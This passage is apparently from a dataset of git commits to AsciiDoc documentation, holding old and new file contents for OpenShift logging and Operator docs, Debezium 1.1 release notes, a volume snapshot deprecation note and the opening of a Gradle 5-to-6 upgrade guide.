Watermark High\n status: \"True\"\n type: NodeStorage\n deploymentName: example-elasticsearch-cdm-0-1\n upgradeStatus: {}\n----\n\nThis status message indicates the log store node selector in the CR does not match any nodes in the cluster:\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - lastTransitionTime: 2019-04-10T02:26:24Z\n message: '0\/8 nodes are available: 8 node(s) didn''t match node selector.'\n reason: Unschedulable\n status: \"True\"\n type: Unschedulable\n----\n\nThis status message indicates that the log store CR uses a non-existent PVC.\n\n[source,yaml]\n----\nstatus:\n nodes:\n - conditions:\n - last Transition Time: 2019-04-10T05:55:51Z\n message: pod has unbound immediate PersistentVolumeClaims (repeated 5 times)\n reason: Unschedulable\n status: True\n type: Unschedulable\n----\n\nThis status message indicates that your log store cluster does not have enough nodes to support your log store redundancy policy.\n\n[source,yaml]\n----\nstatus:\n clusterHealth: \"\"\n conditions:\n - lastTransitionTime: 2019-04-17T20:01:31Z\n message: Wrong RedundancyPolicy selected. Choose different RedundancyPolicy or\n add more nodes with data roles\n reason: Invalid Settings\n status: \"True\"\n type: InvalidRedundancy\n----\n\nThis status message indicates your cluster has too many control plane nodes (also known as the master nodes):\n\n[source,yaml]\n----\nstatus:\n clusterHealth: green\n conditions:\n - lastTransitionTime: '2019-04-17T20:12:34Z'\n message: >-\n Invalid master nodes count. Please ensure there are no more than 3 total\n nodes with master roles\n reason: Invalid Settings\n status: 'True'\n type: InvalidMasters\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0687f4d318f2edc80d0cfefdf717aec3dd21c475","subject":"Related image block is defined to use image as the key","message":"Related image block is defined to use image as the key\n\nThe value as the yaml key for the image pull spec in related images\nis not correct it should be image`.\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/olm-enabling-operator-restricted-network.adoc","new_file":"modules\/olm-enabling-operator-restricted-network.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * operators\/operator_sdk\/osdk-generating-csvs.adoc\n\n[id=\"olm-enabling-operator-for-restricted-network_{context}\"]\n= Enabling your Operator for restricted network environments\n\nAs an Operator author, your CSV must meet the following additional requirements\nfor your Operator to run properly in a restricted network environment:\n\n* List any _related images_, or other container images that your Operator might\nrequire to perform their functions.\n* Reference all specified images by a digest (SHA) and not by a tag.\n\nYou must use SHA references to related images in two places in the Operator's\nCSV:\n\n* in `spec.relatedImages`:\n+\n[source,yaml]\n----\n...\nspec:\n relatedImages: <1>\n - name: etcd-operator <2>\n image: quay.io\/etcd-operator\/operator@sha256:d134a9865524c29fcf75bbc4469013bc38d8a15cb5f41acfddb6b9e492f556e4 <3>\n - name: etcd-image\n image: quay.io\/etcd-operator\/etcd@sha256:13348c15263bd8838ec1d5fc4550ede9860fcbb0f843e48cbccec07810eebb68\n...\n----\n<1> Create a `relatedImages` section and set the list of related images.\n<2> Specify a unique identifier for the image.\n<3> Specify each image by a digest (SHA), not by an image tag.\n\n* in the `env` section of the Operators Deployments when declaring environment\nvariables that inject the image that the Operator should use:\n+\n[source,yaml]\n----\nspec:\n install:\n spec:\n deployments:\n - name: etcd-operator-v3.1.1\n spec:\n replicas: 1\n selector:\n matchLabels:\n name: etcd-operator\n strategy:\n type: Recreate\n template:\n metadata:\n labels:\n name: etcd-operator\n spec:\n containers:\n - args:\n - \/opt\/etcd\/bin\/etcd_operator_run.sh\n env:\n - name: WATCH_NAMESPACE\n valueFrom:\n fieldRef:\n fieldPath: metadata.annotations['olm.targetNamespaces']\n - name: ETCD_OPERATOR_DEFAULT_ETCD_IMAGE <1>\n value: quay.io\/etcd-operator\/etcd@sha256:13348c15263bd8838ec1d5fc4550ede9860fcbb0f843e48cbccec07810eebb68 <2>\n - name: ETCD_LOG_LEVEL\n value: INFO\n image: quay.io\/etcd-operator\/operator@sha256:d134a9865524c29fcf75bbc4469013bc38d8a15cb5f41acfddb6b9e492f556e4 <3>\n imagePullPolicy: IfNotPresent\n livenessProbe:\n httpGet:\n path: \/healthy\n port: 8080\n initialDelaySeconds: 10\n periodSeconds: 30\n name: etcd-operator\n readinessProbe:\n httpGet:\n path: \/ready\n port: 8080\n initialDelaySeconds: 10\n periodSeconds: 30\n resources: {}\n serviceAccountName: etcd-operator\n strategy: deployment\n----\n<1> Inject the images referenced by the Operator via environment variables.\n<2> Specify each image by a digest (SHA), not by an image tag.\n<3> Also reference the Operator container image by a digest (SHA), not by an image tag.\n\n* Look for the `Disconnected` annotation, which indicates that the Operator works\nin a disconnected environment:\n+\n[source,yaml]\n----\nmetadata:\n annotations:\n operators.openshift.io\/infrastructure-features: '[\"Disconnected\"]'\n----\n+\nOperators can be filtered in OperatorHub by this infrastructure feature.\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * operators\/operator_sdk\/osdk-generating-csvs.adoc\n\n[id=\"olm-enabling-operator-for-restricted-network_{context}\"]\n= Enabling your Operator for restricted network environments\n\nAs an Operator author, your CSV must meet the following additional requirements\nfor your Operator to run properly in a restricted network environment:\n\n* List any _related images_, or other container images that your Operator might\nrequire to perform their functions.\n* Reference all specified images by a digest (SHA) and not by a tag.\n\nYou must use SHA references to related images in two places in the Operator's\nCSV:\n\n* in `spec.relatedImages`:\n+\n[source,yaml]\n----\n...\nspec:\n relatedImages: <1>\n - name: etcd-operator <2>\n value: quay.io\/etcd-operator\/operator@sha256:d134a9865524c29fcf75bbc4469013bc38d8a15cb5f41acfddb6b9e492f556e4 <3>\n - name: etcd-image\n value: quay.io\/etcd-operator\/etcd@sha256:13348c15263bd8838ec1d5fc4550ede9860fcbb0f843e48cbccec07810eebb68\n...\n----\n<1> Create a `relatedImages` section and set the list of related images.\n<2> Specify a unique identifier for the image.\n<3> Specify each image by a digest (SHA), not by an image tag.\n\n* in the `env` section of the Operators Deployments when declaring environment\nvariables that inject the image that the Operator should use:\n+\n[source,yaml]\n----\nspec:\n install:\n spec:\n deployments:\n - name: etcd-operator-v3.1.1\n spec:\n replicas: 1\n selector:\n matchLabels:\n name: etcd-operator\n strategy:\n type: Recreate\n template:\n metadata:\n labels:\n name: etcd-operator\n spec:\n containers:\n - args:\n - \/opt\/etcd\/bin\/etcd_operator_run.sh\n env:\n - name: WATCH_NAMESPACE\n valueFrom:\n fieldRef:\n fieldPath: metadata.annotations['olm.targetNamespaces']\n - name: ETCD_OPERATOR_DEFAULT_ETCD_IMAGE <1>\n value: quay.io\/etcd-operator\/etcd@sha256:13348c15263bd8838ec1d5fc4550ede9860fcbb0f843e48cbccec07810eebb68 <2>\n - name: ETCD_LOG_LEVEL\n value: INFO\n image: quay.io\/etcd-operator\/operator@sha256:d134a9865524c29fcf75bbc4469013bc38d8a15cb5f41acfddb6b9e492f556e4 <3>\n imagePullPolicy: IfNotPresent\n livenessProbe:\n httpGet:\n path: \/healthy\n port: 8080\n initialDelaySeconds: 10\n periodSeconds: 30\n name: etcd-operator\n readinessProbe:\n httpGet:\n path: \/ready\n port: 8080\n initialDelaySeconds: 10\n periodSeconds: 30\n resources: {}\n serviceAccountName: etcd-operator\n strategy: deployment\n----\n<1> Inject the images referenced by the Operator via environment variables.\n<2> Specify each image by a digest (SHA), not by an image tag.\n<3> Also reference the Operator container image by a digest (SHA), not by an image tag.\n\n* Look for the `Disconnected` annotation, which indicates that the Operator works\nin a disconnected environment:\n+\n[source,yaml]\n----\nmetadata:\n annotations:\n operators.openshift.io\/infrastructure-features: '[\"Disconnected\"]'\n----\n+\nOperators can be filtered in OperatorHub by this infrastructure feature.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a66f9b750ba087b8c805fc05cdc00ce540654c2","subject":"[release] Changelog for 1.1.0.Beta1","message":"[release] Changelog for 1.1.0.Beta1\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"releases\/1.1\/release-notes.asciidoc","new_file":"releases\/1.1\/release-notes.asciidoc","new_contents":"= Release Notes for Debezium 1.1\n:awestruct-layout: doc\n:awestruct-documentation_version: \"1.1\"\n:toc:\n:toc-placement: macro\n:toclevels: 1\n:sectanchors:\n:linkattrs:\n:icons: font\n\nAll notable changes for Debezium releases are documented in this file.\nRelease numbers follow http:\/\/semver.org[Semantic Versioning].\n\ntoc::[]\n\n[[release-1.1.0-beta1]]\n== *Release 1.1.0.Beta1* _(February 5th, 2020)_\n\nSee the https:\/\/issues.redhat.com\/secure\/ReleaseNote.jspa?projectId=12317320&version=12344479[complete list of issues].\n\n=== Kafka compatibility\n\nThis release has been built against Kafka Connect 2.4.0 and has been tested with version 2.4.0 of the Kafka brokers.\nSee the https:\/\/kafka.apache.org\/documentation\/#upgrade[Kafka documentation] for compatibility with other versions of Kafka brokers.\n\n=== Upgrading\n\nBefore upgrading the MySQL, MongoDB, PostgreSQL or SQL Server connectors, be sure to check the backward-incompatible changes that have been made since the release you were using.\n\nWhen you decide to upgrade one of these connectors to 1.1.0.Beta1 from any of the earlier 1.1.x, 1.0.x, 0.10.x, 0.9.x, 0.8.x, 0.7.x, 0.6.x, 0.5.x, 0.4.x, 0.3.x, 0.2.x, or 0.1.x versions,\nfirst check the upgrading notes for the version you're using.\nGracefully stop the running connector, remove the old plugin files, install the 1.1.0.Beta1 plugin files, and restart the connector using the same configuration.\nUpon restart, the 1.1.0.Beta1 connectors will continue where the previous connector left off.\nAs one might expect, all change events previously written to Kafka by the old connector will not be modified.\n\nIf you are using our docker images then do not forget to pull them fresh from Docker registry.\n\n=== Breaking changes\n\nBefore updating the DecoderBufs logical decoding plug-in in your Postgres database to this new version (or when pulling the debezium\/postgres container image for that new version), it is neccessary to upgrade the Debezium Postgres connector to 1.0.1.Final or 1.1.0.Alpha2 or later (https:\/\/issues.jboss.org\/browse\/DBZ-1052[DBZ-1052]).\n\nThe `ExtractNewDocumentState` SMT to be used with the Debezium MongoDB connector will convert `Date` and `Timestamp` fields now into the `org.apache.kafka.connect.data.Timestam`p logical type, clarifying its semantics.\nThe schema type itself remains unchanged as `int64`.\nPlease note that the resolution of `Timestamp` is seconds as per the semantics of that type in MongoDB. (https:\/\/issues.jboss.org\/browse\/DBZ-1717[DBZ-1717]).\n\n\n=== New Features\n\n* Create a plug-in for DB2 streaming https:\/\/issues.jboss.org\/browse\/DBZ-695[DBZ-695]\n* Add topic routing by field option for New Record State Extraction https:\/\/issues.jboss.org\/browse\/DBZ-1715[DBZ-1715]\n* Generate date(time) field types in the Kafka Connect data structure https:\/\/issues.jboss.org\/browse\/DBZ-1717[DBZ-1717]\n* Publish TX boundary markers on a TX metadata topic https:\/\/issues.jboss.org\/browse\/DBZ-1052[DBZ-1052]\n* Replace connectorName with kafkaTopicPrefix in kafka key\/value schema https:\/\/issues.jboss.org\/browse\/DBZ-1763[DBZ-1763]\n\n\n=== Fixes\n\nThis release includes the following fixes:\n\n* Connector error after adding a new not null column to table in Postgres https:\/\/issues.jboss.org\/browse\/DBZ-1698[DBZ-1698]\n* MySQL connector doesn't use default value of connector.port https:\/\/issues.jboss.org\/browse\/DBZ-1712[DBZ-1712]\n* Fix broken images in Antora and brush up AsciiDoc https:\/\/issues.jboss.org\/browse\/DBZ-1725[DBZ-1725]\n* ANTLR parser cannot parse MariaDB Table DDL with TRANSACTIONAL attribute https:\/\/issues.jboss.org\/browse\/DBZ-1733[DBZ-1733]\n* Postgres connector does not support proxied connections https:\/\/issues.jboss.org\/browse\/DBZ-1738[DBZ-1738]\n* GET DIAGNOSTICS statement not parseable https:\/\/issues.jboss.org\/browse\/DBZ-1740[DBZ-1740]\n* Examples use http access to Maven repos which is no longer available https:\/\/issues.jboss.org\/browse\/DBZ-1741[DBZ-1741]\n* MySql password logged out in debug log level https:\/\/issues.jboss.org\/browse\/DBZ-1748[DBZ-1748]\n* Cannot shutdown PostgreSQL if there is an active Debezium connector https:\/\/issues.jboss.org\/browse\/DBZ-1727[DBZ-1727]\n\n\n=== Other changes\n\nThis release includes also other changes:\n\n* Add tests for using fallback values with default REPLICA IDENTITY https:\/\/issues.jboss.org\/browse\/DBZ-1158[DBZ-1158]\n* Migrate all attribute name\/value pairs to Antora component descriptors https:\/\/issues.jboss.org\/browse\/DBZ-1687[DBZ-1687]\n* Upgrade to Awestruct 0.6.0 https:\/\/issues.jboss.org\/browse\/DBZ-1719[DBZ-1719]\n* Run CI tests for delivered non-connector modules (like Quarkus) https:\/\/issues.jboss.org\/browse\/DBZ-1724[DBZ-1724]\n* Remove overlap of different documentation config files https:\/\/issues.jboss.org\/browse\/DBZ-1729[DBZ-1729]\n* Don't fail upon receiving unkown operation events https:\/\/issues.jboss.org\/browse\/DBZ-1747[DBZ-1747]\n* Provide a method to identify an envelope schema https:\/\/issues.jboss.org\/browse\/DBZ-1751[DBZ-1751]\n* Upgrade to Mongo Java Driver version 3.12.1 https:\/\/issues.jboss.org\/browse\/DBZ-1761[DBZ-1761]\n* Create initial Proposal for DB2 Source Connector https:\/\/issues.jboss.org\/browse\/DBZ-1509[DBZ-1509]\n* Review Pull Request for DB2 Connector https:\/\/issues.jboss.org\/browse\/DBZ-1527[DBZ-1527]\n* Test Set up of the DB2 Test Instance https:\/\/issues.jboss.org\/browse\/DBZ-1556[DBZ-1556]\n* Create Documentation for the DB2 Connector https:\/\/issues.jboss.org\/browse\/DBZ-1557[DBZ-1557]\n* Verify support of all DB2 types https:\/\/issues.jboss.org\/browse\/DBZ-1708[DBZ-1708]\n\n\n\n[[release-1.1.0-alpha1]]\n== *Release 1.1.0.Alpha1* _(January 16th, 2020)_\n\nSee the https:\/\/issues.redhat.com\/secure\/ReleaseNote.jspa?projectId=12317320&version=12344080[complete list of issues].\n\n=== Kafka compatibility\n\nThis release has been built against Kafka Connect 2.4.0 and has been tested with version 2.4.0 of the Kafka brokers.\nSee the https:\/\/kafka.apache.org\/documentation\/#upgrade[Kafka documentation] for compatibility with other versions of Kafka brokers.\n\n=== Upgrading\n\nBefore upgrading the MySQL, MongoDB, PostgreSQL or SQL Server connectors, be sure to check the backward-incompatible changes that have been made since the release you were using.\n\nWhen you decide to upgrade one of these connectors to 1.1.0.Alpha1 from any of the earlier 1.1.x, 1.0.x, 0.10.x, 0.9.x, 0.8.x, 0.7.x, 0.6.x, 0.5.x, 0.4.x, 0.3.x, 0.2.x, or 0.1.x versions,\nfirst check the upgrading notes for the version you're using.\nGracefully stop the running connector, remove the old plugin files, install the 1.1.0.Alpha1 plugin files, and restart the connector using the same configuration.\nUpon restart, the 1.1.0.Alpha1 connectors will continue where the previous connector left off.\nAs one might expect, all change events previously written to Kafka by the old connector will not be modified.\n\nIf you are using our docker images then do not forget to pull them fresh from Docker registry.\n\n=== Breaking changes\n\nWhen using the outbox event routing SMT and configuring a column from which to obtain the Kafka record timestamp from (table.field.event.timestamp option), then that value could have been exported as milliseconds, microseconds or nanoseconds, based on the source column's definition.\nAs of this release, the timestamp always be exported as milliseconds (https:\/\/issues.jboss.org\/browse\/DBZ-1707[DBZ-1707]).\n\nThe deprecated Postgres connector option `slot.drop_on_stop` has been removed; use `slot.drop.on.stop` instead (https:\/\/issues.jboss.org\/browse\/DBZ-1600[DBZ-1600]).\n\n\n=== New Features\n\n* MongoDB authentication against non-admin authsource https:\/\/issues.jboss.org\/browse\/DBZ-1168[DBZ-1168]\n* Oracle: Add support for different representations of \"NUMBER\" Data Type https:\/\/issues.jboss.org\/browse\/DBZ-1552[DBZ-1552]\n* Update Mongo Java driver to version 3.12.0 https:\/\/issues.jboss.org\/browse\/DBZ-1690[DBZ-1690]\n* Support exporting change events in \"CloudEvents\" format https:\/\/issues.jboss.org\/browse\/DBZ-1292[DBZ-1292]\n* Build Quarkus extension facilitating implementations of the outbox pattern https:\/\/issues.jboss.org\/browse\/DBZ-1478[DBZ-1478]\n* Support column masking option for Postgres https:\/\/issues.jboss.org\/browse\/DBZ-1685[DBZ-1685]\n\n\n=== Fixes\n\nThis release includes the following fixes:\n\n* Make slot creation in PostgreSQL more resilient https:\/\/issues.jboss.org\/browse\/DBZ-1684[DBZ-1684]\n* SQLserver type time(4)...time(7) lost nanoseconds https:\/\/issues.jboss.org\/browse\/DBZ-1688[DBZ-1688]\n* Support boolean as default for INT(1) column in MySQL https:\/\/issues.jboss.org\/browse\/DBZ-1689[DBZ-1689]\n* SIGNAL statement is not recognized by DDL parser https:\/\/issues.jboss.org\/browse\/DBZ-1691[DBZ-1691]\n* When using in embedded mode MYSQL connector fails https:\/\/issues.jboss.org\/browse\/DBZ-1693[DBZ-1693]\n* MySQL connector fails to parse trigger DDL https:\/\/issues.jboss.org\/browse\/DBZ-1699[DBZ-1699]\n\n\n=== Other changes\n\nThis release includes also other changes:\n\n* Update outbox routing example https:\/\/issues.jboss.org\/browse\/DBZ-1673[DBZ-1673]\n* Add option to JSON change event SerDe for ignoring unknown properties https:\/\/issues.jboss.org\/browse\/DBZ-1703[DBZ-1703]\n* Update debezium\/awestruct image to use Antora 2.3 alpha 2 https:\/\/issues.jboss.org\/browse\/DBZ-1713[DBZ-1713]\n\n","old_contents":"= Release Notes for Debezium 1.1\n:awestruct-layout: doc\n:awestruct-documentation_version: \"1.1\"\n:toc:\n:toc-placement: macro\n:toclevels: 1\n:sectanchors:\n:linkattrs:\n:icons: font\n\nAll notable changes for Debezium releases are documented in this file.\nRelease numbers follow http:\/\/semver.org[Semantic Versioning].\n\ntoc::[]\n\n[[release-1.1.0-alpha1]]\n== *Release 1.1.0.Alpha1* _(January 16th, 2020)_\n\nSee the https:\/\/issues.redhat.com\/secure\/ReleaseNote.jspa?projectId=12317320&version=12344080[complete list of issues].\n\n=== Kafka compatibility\n\nThis release has been built against Kafka Connect 2.4.0 and has been tested with version 2.4.0 of the Kafka brokers.\nSee the https:\/\/kafka.apache.org\/documentation\/#upgrade[Kafka documentation] for compatibility with other versions of Kafka brokers.\n\n=== Upgrading\n\nBefore upgrading the MySQL, MongoDB, PostgreSQL or SQL Server connectors, be sure to check the backward-incompatible changes that have been made since the release you were using.\n\nWhen you decide to upgrade one of these connectors to 1.1.0.Alpha1 from any of the earlier 1.1.x, 1.0.x, 0.10.x, 0.9.x, 0.8.x, 0.7.x, 0.6.x, 0.5.x, 0.4.x, 0.3.x, 0.2.x, or 0.1.x versions,\nfirst check the upgrading notes for the version you're using.\nGracefully stop the running connector, remove the old plugin files, install the 1.1.0.Alpha1 plugin files, and restart the connector using the same configuration.\nUpon restart, the 1.1.0.Alpha1 connectors will continue where the previous connector left off.\nAs one might expect, all change events previously written to Kafka by the old connector will not be modified.\n\nIf you are using our docker images then do not forget to pull them fresh from Docker registry.\n\n=== Breaking changes\n\nWhen using the outbox event routing SMT and configuring a column from which to obtain the Kafka record timestamp from (table.field.event.timestamp option), then that value could have been exported as milliseconds, microseconds or nanoseconds, based on the source column's definition.\nAs of this release, the timestamp always be exported as milliseconds (https:\/\/issues.jboss.org\/browse\/DBZ-1707[DBZ-1707]).\n\nThe deprecated Postgres connector option `slot.drop_on_stop` has been removed; use `slot.drop.on.stop` instead (https:\/\/issues.jboss.org\/browse\/DBZ-1600[DBZ-1600]).\n\n\n=== New Features\n\n* MongoDB authentication against non-admin authsource https:\/\/issues.jboss.org\/browse\/DBZ-1168[DBZ-1168]\n* Oracle: Add support for different representations of \"NUMBER\" Data Type https:\/\/issues.jboss.org\/browse\/DBZ-1552[DBZ-1552]\n* Update Mongo Java driver to version 3.12.0 https:\/\/issues.jboss.org\/browse\/DBZ-1690[DBZ-1690]\n* Support exporting change events in \"CloudEvents\" format https:\/\/issues.jboss.org\/browse\/DBZ-1292[DBZ-1292]\n* Build Quarkus extension facilitating implementations of the outbox pattern https:\/\/issues.jboss.org\/browse\/DBZ-1478[DBZ-1478]\n* Support column masking option for Postgres https:\/\/issues.jboss.org\/browse\/DBZ-1685[DBZ-1685]\n\n\n=== Fixes\n\nThis release includes the following fixes:\n\n* Make slot creation in PostgreSQL more resilient https:\/\/issues.jboss.org\/browse\/DBZ-1684[DBZ-1684]\n* SQLserver type time(4)...time(7) lost nanoseconds https:\/\/issues.jboss.org\/browse\/DBZ-1688[DBZ-1688]\n* Support boolean as default for INT(1) column in MySQL https:\/\/issues.jboss.org\/browse\/DBZ-1689[DBZ-1689]\n* SIGNAL statement is not recognized by DDL parser https:\/\/issues.jboss.org\/browse\/DBZ-1691[DBZ-1691]\n* When using in embedded mode MYSQL connector fails https:\/\/issues.jboss.org\/browse\/DBZ-1693[DBZ-1693]\n* MySQL connector fails to parse trigger DDL https:\/\/issues.jboss.org\/browse\/DBZ-1699[DBZ-1699]\n\n\n=== Other changes\n\nThis release includes also other changes:\n\n* Update outbox routing example https:\/\/issues.jboss.org\/browse\/DBZ-1673[DBZ-1673]\n* Add option to JSON change event SerDe for ignoring unknown properties https:\/\/issues.jboss.org\/browse\/DBZ-1703[DBZ-1703]\n* Update debezium\/awestruct image to use Antora 2.3 alpha 2 https:\/\/issues.jboss.org\/browse\/DBZ-1713[DBZ-1713]\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59e42ac2cee63fda787609359d00cb109ce5eaa6","subject":"add 4.2 deprecation note - snapshots","message":"add 4.2 deprecation note - snapshots\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"storage\/persistent-storage\/persistent-storage-snapshots.adoc","new_file":"storage\/persistent-storage\/persistent-storage-snapshots.adoc","new_contents":"[id=\"persistent-storage-snapshots\"]\n= Persistent storage using volume snapshots\ninclude::modules\/common-attributes.adoc[]\n:context: persistent-storage-snapshots\n\ntoc::[]\n\n[IMPORTANT]\n====\nVolume snapshot is deprecated in {product-title} 4.2.\n====\n\nThis document describes how to use VolumeSnapshots to protect against data loss in {product-title}. Familiarity with xref:..\/..\/storage\/understanding-persistent-storage.adoc#persistent-volumes_understanding-persistent-storage[persistent volumes] is suggested.\n\n:FeatureName: Volume snapshot\n\ninclude::modules\/technology-preview.adoc[leveloffset=+0]\n\ninclude::modules\/persistent-storage-snapshots-about.adoc[leveloffset=+1]\n\ninclude::modules\/persistent-storage-snapshots-controller-provisioner.adoc[leveloffset=+1]\n\ninclude::modules\/persistent-storage-snapshots-starting-controller-provisioner.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-controller-provisioner-aws-gce.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-managing-users.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-creating-deleting.adoc[leveloffset=+1]\n\ninclude::modules\/persistent-storage-snapshots-create.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-restore.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-delete.adoc[leveloffset=+2]\n","old_contents":"[id=\"persistent-storage-snapshots\"]\n= Persistent storage using volume snapshots\ninclude::modules\/common-attributes.adoc[]\n:context: persistent-storage-snapshots\n\ntoc::[]\n\n\nThis document describes how to use VolumeSnapshots to protect against data loss in {product-title}. Familiarity with xref:..\/..\/storage\/understanding-persistent-storage.adoc#persistent-volumes_understanding-persistent-storage[persistent volumes] is suggested.\n\n:FeatureName: Volume snapshot\n\ninclude::modules\/technology-preview.adoc[leveloffset=+0]\n\ninclude::modules\/persistent-storage-snapshots-about.adoc[leveloffset=+1]\n\ninclude::modules\/persistent-storage-snapshots-controller-provisioner.adoc[leveloffset=+1]\n\ninclude::modules\/persistent-storage-snapshots-starting-controller-provisioner.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-controller-provisioner-aws-gce.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-managing-users.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-creating-deleting.adoc[leveloffset=+1]\n\ninclude::modules\/persistent-storage-snapshots-create.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-restore.adoc[leveloffset=+2]\n\ninclude::modules\/persistent-storage-snapshots-delete.adoc[leveloffset=+2]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bc59b6e6d87992d1f66becc3c68e32410c77e46b","subject":"Update subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","message":"Update subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc\n\nCo-Authored-By: Sterling Greene <f8dc2ca1b24f71bd07cf2580bf789fed70c9e45c@users.noreply.github.com>","repos":"blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_contents":"\/\/ Copyright 2019 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[upgrading_version_5]]\n= Upgrading your build from Gradle 5.x to 6.0\n\nThis chapter provides the information you need to migrate your Gradle 5.x builds to Gradle 6.0. For migrating from Gradle 4.x, complete the <<upgrading_version_4.adoc#upgrading_version_4, 4.x to 5.0 guide>> first.\n\nWe recommend the following steps for all users:\n\n. Try running `gradle help --scan` and view the https:\/\/gradle.com\/enterprise\/releases\/2018.4\/#identify-usages-of-deprecated-gradle-functionality[deprecations view] of the generated build scan.\n+\nimage::deprecations.png[Deprecations View of a Gradle Build Scan]\n+\nThis is so that you can see any deprecation warnings that apply to your build.\n+\nAlternatively, you could run `gradle help --warning-mode=all` to see the deprecations in the console, though it may not report as much detailed information.\n. Update your plugins.\n+\nSome plugins will break with this new version of Gradle, for example because they use internal APIs that have been removed or changed. The previous step will help you identify potential problems by issuing deprecation warnings when a plugin does try to use a deprecated part of the API.\n+\n. Run `gradle wrapper --gradle-version {gradleVersion}` to update the project to {gradleVersion}.\n. Try to run the project and debug any errors using the <<troubleshooting.adoc#troubleshooting, Troubleshooting Guide>>.\n\n[[changes_6.0]]\n== Upgrading from 5.6 and earlier\n\n=== Deprecations\n\n==== Dependencies should no longer be declared using the compile and runtime configurations\n\nThe usage of the `compile` and `runtime` configurations in the Java ecosystem plugins has been discouraged for some time now.\nThese configurations, and their counterparts in other sources sets (e.g. `testCompile` and `testRuntime`), should not be utilised anymore.\nInstead, use the `implementation`, `api`, `compileOnly` and `runtimeOnly` configurations to declare dependencies and the `compileClasspath` and `runtimeClasspath` configurations to resolve dependencies.\n\n==== Local build cache type shouldn't be specified\n\nWhen configuring the local build cache the use of `BuildCacheConfiguration.local(Class)` and `local(Class, Action)` has now been deprecated; use `getLocal()` or `local(Action)` instead.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== `IncrementalTaskInputs` has been deprecated\n\nIn Gradle 5.4 we introduced a new API for implementing <<custom_tasks.adoc#incremental_tasks,incremental tasks>>: link:{groovyDslPath}\/org.gradle.work.InputChanges.html[InputChanges].\nIts predecessor `IncrementalTaskInputs` has been deprecated.\n\n==== Forced dependencies\n\nForcing dependency versions using `force = true` on a first-level dependency is deprecated.\nForce has both a semantic and ordering issue which can be avoided by using a <<rich_versions.adoc#rich-version-constraints, strict version constraint>>.\n\n==== Invalid task definitions and configurations\n\nProblems with task definitions are called out in deprecation warnings like this:\n\n```\nProperty 'options.configFile' is not annotated with an input or output annotation. This behaviour has been deprecated and is scheduled to be removed in Gradle 7.0.\n```\n\n==== Search upwards related API in `StartParameter` has been deprecated\n\nIn Gradle 5.0 we removed the `--no-search-upward` CLI parameter.\nThe related APIs in `StartParameter` are now deprecated.\n\n==== `BuildListener#buildStarted` and `Gradle#buildStarted` has been deprecated\n\nThese methods currently do not work as expected.\nThey are being deprecated to avoid confusion.\n\n=== Potential breaking changes\n\n==== Android Gradle Plugin 3.3 and earlier is not supported anymore\n\nGradle 6.0 supports Android Gradle Plugin versions 3.4 and later.\n\n==== Archive tasks fail on duplicate files\n\nUntil now archive tasks defaulted to the `INCLUDE` duplicates strategy, allowing the same path to exist multiple times in an archive.\n\nIn Gradle 6.0 we are switching to `FAIL`, prohibiting duplicate files in archives.\nIf you still want to allow them, you can be specify that explicitly:\n\n```\ntask archive(type: Zip) {\n duplicatesStrategy = DuplicatesStrategy.INCLUDE \/\/ allow duplicates\n archiveName = 'archive.zip'\n from 'src'\n}\n```\n\n*Note* that `Copy` and `Sync` tasks are unaffected: they still use the `INCLUDE` duplicates strategy as default.\n\n==== Local build cache is always a directory cache\n\nIn the past it was possible to use any build cache implementation as the `local` cache.\nThis is not allowed anymore as the local cache is always a `DirectoryBuildCache`.\nCalls to `BuildCacheConfiguration.local(Class)` with anything other than `DirectoryBuildCache` as the type will fail the build.\nCalling these methods with the `DirectoryBuildCache` type will produce a deprecation warning.\nUse `getLocal()` and `local(Action)` instead, respectively.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== Failing to pack or unpack cached results will now fail the 